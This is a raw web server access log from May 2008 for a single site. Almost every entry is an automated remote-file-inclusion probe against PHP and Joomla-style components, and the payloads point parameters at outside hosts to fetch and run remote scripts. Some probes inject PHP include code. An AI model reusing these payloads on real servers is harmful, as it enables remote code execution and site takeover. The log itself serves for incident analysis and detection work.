196.35.158.180 - - [04/May/2008:12:04:11 -0700] "GET //modules/xfsection/modify.php?dir_module=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
196.35.158.180 - - [04/May/2008:12:04:12 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
61.47.60.169 - - [04/May/2008:12:04:15 -0700] "GET /logs//login.php?dir=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
61.47.60.169 - - [04/May/2008:12:04:24 -0700] "GET /logs//login.php?dir=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
61.47.60.169 - - [04/May/2008:12:04:26 -0700] "GET //login.php?dir=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
61.47.60.169 - - [04/May/2008:12:04:35 -0700] "GET //login.php?dir=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.19.130 - - [04/May/2008:12:04:40 -0700] "GET /p.php?p=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.121.94.156 - - [04/May/2008:12:06:09 -0700] "GET /logs/access_080211.log//modules/agendax/addevent.inc.php?agendax_path=http://r0xshock.90megs.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.94.156 - - [04/May/2008:12:06:09 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://r0xshock.90megs.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.94.156 - - [04/May/2008:12:06:09 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://r0xshock.90megs.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.94.156 - - [04/May/2008:12:07:01 -0700] "GET /logs/access_080228.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://r0xshock.90megs.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.94.156 - - [04/May/2008:12:07:01 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://r0xshock.90megs.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.92.9 - - [04/May/2008:12:07:05 -0700] "GET /logs/access_080211.log//modules/agendax/addevent.inc.php?agendax_path=http://r0xshock.90megs.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.92.9 - - [04/May/2008:12:07:06 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://r0xshock.90megs.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.92.9 - - [04/May/2008:12:07:06 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://r0xshock.90megs.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.32.31.33 - - [04/May/2008:12:07:23 -0700] "GET /logs/access_080209.log///squirrelcart/cart_content.php?cart_isp_root=http://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.32.31.33 - - [04/May/2008:12:07:23 -0700] "GET ///squirrelcart/cart_content.php?cart_isp_root=http://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.32.31.33 - - [04/May/2008:12:07:24 -0700] "GET /logs///squirrelcart/cart_content.php?cart_isp_root=http://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.98.184.24 - - [04/May/2008:12:07:25 -0700] "GET /logs/access.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.98.184.24 - - [04/May/2008:12:07:25 -0700] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.98.184.24 - - [04/May/2008:12:07:26 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.86.92.9 - - [04/May/2008:12:07:49 -0700] "GET /logs/access_080228.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://r0xshock.90megs.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.92.9 - - [04/May/2008:12:07:49 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://r0xshock.90megs.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.231.120.104 - - [04/May/2008:12:08:04 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://users.volja.net/smrad/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.175.248.213 - - [04/May/2008:12:09:17 -0700] "GET /logs/access_080309.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://admin.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.107.122 - - [04/May/2008:12:09:35 -0700] "GET /logs/access.log//index.php?meio=http://www.deadword.we.bs/mic22.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.19.130 - - [04/May/2008:12:09:37 -0700] "GET /logs/access_080324.log/skin/zero_vote/error.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.107.122 - - [04/May/2008:12:09:39 -0700] "GET //index.php?meio=http://www.deadword.we.bs/mic22.txt???????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [04/May/2008:12:09:39 -0700] "GET /logs//index.php?meio=http://www.deadword.we.bs/mic22.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.19.130 - - [04/May/2008:12:10:08 -0700] "GET /logs/access_080129.log/skin/zero_vote/error.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.131.61 - - [04/May/2008:12:10:36 -0700] "GET /logs/access.log//browse.php/header.php?prefix=http://www.geocities.com/elmaalia/maknyus.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.131.61 - - [04/May/2008:12:10:36 -0700] "GET /logs//browse.php/header.php?prefix=http://www.geocities.com/elmaalia/maknyus.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.74.9.26 - - [04/May/2008:12:10:51 -0700] "GET /logs/access_080218.log/////?mosConfig_absolute_path=http://www.countryall.altervista.org/php5/431242/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.74.9.26 - - [04/May/2008:12:10:53 -0700] "GET /////?mosConfig_absolute_path=http://www.countryall.altervista.org/php5/431242/index.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
208.74.9.26 - - [04/May/2008:12:10:54 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.countryall.altervista.org/php5/431242/index.txt? HTTP/1.1" 200 45991 "-" "libwww-perl/5.805" "www.dmulk.com"
201.21.40.235 - - [04/May/2008:12:11:30 -0700] "GET /logs/access_080312.log//start.php?id=http://jogador.fxplus.mail333.su/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.89.27.236 - - [04/May/2008:12:11:31 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.27.236 - - [04/May/2008:12:11:31 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.812" "www.dmulk.com"
201.21.40.235 - - [04/May/2008:12:11:31 -0700] "GET //start.php?id=http://jogador.fxplus.mail333.su/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.89.27.236 - - [04/May/2008:12:11:31 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:12:11:31 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:12:11:31 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
201.21.40.235 - - [04/May/2008:12:11:31 -0700] "GET /logs//start.php?id=http://jogador.fxplus.mail333.su/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:12:11:32 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.811" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:12:11:32 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.811" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:12:11:32 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:12:11:32 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:12:11:34 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:12:11:35 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.811" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:12:11:35 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.103.23.40 - - [04/May/2008:12:11:35 -0700] "GET /logs/phphtml.php?htmlclass_path=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [04/May/2008:12:11:36 -0700] "GET /phphtml.php?htmlclass_path=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.27.236 - - [04/May/2008:12:12:08 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.218.85.18 - - [04/May/2008:12:12:23 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/May/2008:12:12:24 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/May/2008:12:12:24 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [04/May/2008:12:12:27 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.deadword.we.bs/mic22.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [04/May/2008:12:12:27 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.deadword.we.bs/mic22.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:12:12:27 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:12:12:28 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.50.26 - - [04/May/2008:12:12:30 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:12:12:31 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.50.26 - - [04/May/2008:12:12:32 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [04/May/2008:12:12:32 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.130.2.13 - - [04/May/2008:12:12:35 -0700] "GET /logs/access_080302.log/index.php?pageurl=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.130.2.13 - - [04/May/2008:12:12:41 -0700] "GET /logs/index.php?pageurl=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.175.248.213 - - [04/May/2008:12:12:43 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://admin.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.130.2.13 - - [04/May/2008:12:12:44 -0700] "GET /index.php?pageurl=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
83.175.248.213 - - [04/May/2008:12:12:51 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://admin.sitesled.com/echo.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.19.130 - - [04/May/2008:12:13:07 -0700] "GET /logs/access_080306.log/p.php?p=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.19.130 - - [04/May/2008:12:13:07 -0700] "GET /logs/p.php?p=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.70.163 - - [04/May/2008:12:13:21 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.70.163 - - [04/May/2008:12:13:25 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.70.163 - - [04/May/2008:12:13:26 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.111.173.45 - - [04/May/2008:12:13:33 -0700] "GET /logs/access_080111.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [04/May/2008:12:13:34 -0700] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [04/May/2008:12:13:34 -0700] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [04/May/2008:12:13:51 -0700] "GET /logs/access_071228.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.70.163 - - [04/May/2008:12:14:40 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.810" "www.dmulk.com"
98.130.2.13 - - [04/May/2008:12:14:43 -0700] "GET /logs/access_080101.log/index.php?pageurl=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.215.223.191 - - [04/May/2008:12:14:59 -0700] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.215.223.191 - - [04/May/2008:12:14:59 -0700] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.173.45 - - [04/May/2008:12:15:23 -0700] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.138.217.247 - - [04/May/2008:12:15:29 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.nameserver11.net/billing2/include/html/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.138.217.247 - - [04/May/2008:12:15:29 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.nameserver11.net/billing2/include/html/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.25.167.10 - - [04/May/2008:12:16:04 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.25.167.10 - - [04/May/2008:12:16:08 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.811" "www.dmulk.com"
89.25.167.10 - - [04/May/2008:12:16:11 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.25.167.10 - - [04/May/2008:12:16:17 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.25.167.10 - - [04/May/2008:12:16:21 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.811" "www.dmulk.com"
89.25.167.10 - - [04/May/2008:12:16:24 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.25.167.10 - - [04/May/2008:12:16:25 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.25.167.10 - - [04/May/2008:12:16:29 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.811" "www.dmulk.com"
89.25.167.10 - - [04/May/2008:12:16:32 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
61.47.60.169 - - [04/May/2008:12:17:26 -0700] "GET /logs//login.php?dir=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.90.77.57 - - [04/May/2008:12:17:31 -0700] "GET /logs/access_080108.log/classes/templater/templater.class.php?classes_dir=http://www.gameheros.org/WebAdmin/phpmailer/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
61.47.60.169 - - [04/May/2008:12:17:36 -0700] "GET //login.php?dir=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.25.167.10 - - [04/May/2008:12:18:38 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.25.167.10 - - [04/May/2008:12:18:41 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.22.185 - - [04/May/2008:12:20:02 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.21.124 - - [04/May/2008:12:20:03 -0700] "GET /bikes/dteel/2008_02_07/?S=A HTTP/1.0" 200 2521 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.103.23.40 - - [04/May/2008:12:20:12 -0700] "GET /logs/phphtml.php?htmlclass_path=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [04/May/2008:12:20:13 -0700] "GET /logs/phphtml.php?htmlclass_path=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [04/May/2008:12:20:13 -0700] "GET /phphtml.php?htmlclass_path=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [04/May/2008:12:20:13 -0700] "GET /phphtml.php?htmlclass_path=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.141.165 - - [04/May/2008:12:20:17 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.imageforum.ru//language/ctrl.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
